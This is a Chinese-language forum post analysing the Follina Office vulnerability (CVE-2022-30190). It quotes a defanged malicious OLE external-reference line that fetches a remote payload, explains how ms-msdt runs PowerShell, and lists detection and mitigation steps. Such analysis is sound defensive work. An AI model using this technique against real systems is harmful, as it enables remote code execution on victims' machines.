DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 5259|回复: 0

[漏洞相关] 通过 ms-msdt 可攻击 Microsoft Office (CVE-2022-30190)

[复制链接]

188

主题

35

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
354
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2022-6-17 13:36:34 | 显示全部楼层 |阅读模式

我们知道 Microsoft Office 文档的此新的攻击方法始于 @nao_sec 的一条推文,他报告了一个有趣的 Word 文档。 一直以来,Office 文档是传播恶意软件的载体。我们必须与 VBA 宏、XLS 4 宏、嵌入式 payload 等作斗争,但这里的描述很有趣。

此文件在 VT 上目前只有 17 家引擎报红 (https://www.virustotal.com/gui/f ... aec096784/detection)

当打开文件时,什么都没有显示 (它看起来像一个空白文档),但是,查看文档规范,会看到一些有趣的东西:该文档包含指向恶意 URL 的外部引用:

  1. <Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="hxxps://www[.]xmlformats[.]com/office/word/2022/wordprocessingDrawing/RDF842l.html!" TargetMode="External"/>
复制代码

当打开文档并激活内容时,将访问 www[.]xmlformats[.]com,获取以下 payload:



有趣的部分是 windows.location.href。协议架构是 "ms-msdt:/" (注意单斜杠)。这个 MSDT 或 "Microsoft 支持诊断工具" 是什么?msdt.exe 是 Microsoft 提供的一种工具,作用是收集信息以发送给 Microsoft 支持[3]。

Microsoft Office 将自动处理 MSDT URL 并执行 Powershell payload。Base64 包含以下内容:



即使宏被禁用,受保护的视图功能也会发挥作用。但是,Kevin Beaumont 测试了转换为 RTF 形式的文档。即使在 Windows 资源管理器 中预览文档,它也能正常工作。此漏洞不适用于所有 Office 版本 (至少在 Office 2013 和 2016 中)。

当我们在周末查看恶意文件时,Didier 制作了一个新的 payload,它将触发一个经典计算器作为代码执行的演示,他录制了该行为的视频:https://www.youtube.com/watch?v=GybD70_rZDs

这种行为真的很糟糕,如何检测到这一点?请注意,文档中不存在可疑方案 ("ms-msdt:/")。它存在于将由 Office 下载的第一阶段 payload 中。这里有一些想法:

  • 检查父子关系:一个好主意是跟踪从 word.exe 或 excel.exe 等父进程启动的 msdt.exe 进程;
  • 从注册表中删除 "ms-msdt" 方案,Didier 进行了一些测试,并且它有效:https://twitter.com/DidierStevens/status/1531033449561264128
  • 通过创建 ASL 规则防止 Office 产生子进程:Set-MpPreference -AttackSurfaceReductionRules_Ids d4f940ab-401b-4efc-aadc-ad5f3c50688a -AttackSurfaceReductionRules_Actions Enabled
  • 当然,在培训时不要打开可疑文件;

我们将继续关注这一新的攻击方法并更新此文章,随时与我们分享您的发现。可参看以下 PPT 来了解更多细节:



参考



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|小黑屋|DecoyMini 技术交流社区 (吉沃科技) ( 京ICP备2021005070号 )

GMT+8, 2024-12-22 14:50 , Processed in 0.062959 second(s), 26 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表